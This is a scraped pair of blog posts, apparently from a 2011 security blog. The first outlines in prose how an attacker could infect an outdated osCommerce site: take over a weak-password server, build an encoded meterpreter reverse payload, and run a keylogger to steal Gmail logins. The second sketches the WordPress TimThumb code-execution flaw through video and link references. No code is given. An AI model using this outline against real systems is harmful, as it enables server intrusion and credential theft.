<br />
<b>Steps:</b><br />
What i want to show you is how probably an attacker has infected a site running an old copy of osCommerce to spread malware. These are the steps to follow:<br />
<br />
1- Find a place where we can host our malicious code so we need to find a server with weak ssh/ftp password (coolsite.dot).<br />
<br />
2- Create our malware injecting a meterpreter reverse payload into calc.exe and encoding it 3 times using shikata_ga_nai.<br />
<br />
3- Waiting the connection back.<br />
<br />
4- Upload malware and exploit to coolsite.dot.<br />
<br />
5- Waiting for a victim.<br />
<br />
6- Do what you want.<br />
<br />
After obtaining the meterpreter shell we start the keylogger to steal gmail login credentials.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/NvPzHlQTdjo" width="640"></iframe><br />
Reference and more detailed information:<br />
- <a href="http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html">Willysycom mass injection ongoing</a><br />
- <a href="http://www.offensive-security.com/metasploit-unleashed/">Metasploit Unleashed</a>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com1tag:blogger.com,1999:blog-3423828846307461333.post-74832729038951264882011-09-21T10:45:00.001+02:002020-11-22T18:15:55.582+01:00Wordpress TimThumb Exploit (Remote Code Execution)A lot of wordpress themes use timthumb script to resize images. From version 1.15 to 1.33 timthumb allows external domains such as flickr.com to display remote images on your website .<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/yIjjHByz9Pc" width="640"></iframe><br />
<br />
<br />
More detailed information here:<br />
- <a href="http://goo.gl/ZbHC0">Wordpress timthum hack</a><br />
- <a href="http://goo.gl/DOWo8">Zero Day vulnerability in many wordpress themes</a><br />
<br />
Resources:<br />
- <a href="http://goo.gl/6Z9pO">TimThumb version used</a><br />
- <a href="http://goo.gl/KZfOO">Vulnerable wordpress theme</a><br />
- <a href="http://goo.gl/KR8xT">List of vulnerable wordpress themes</a><br />
<div>
<br /></div>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com2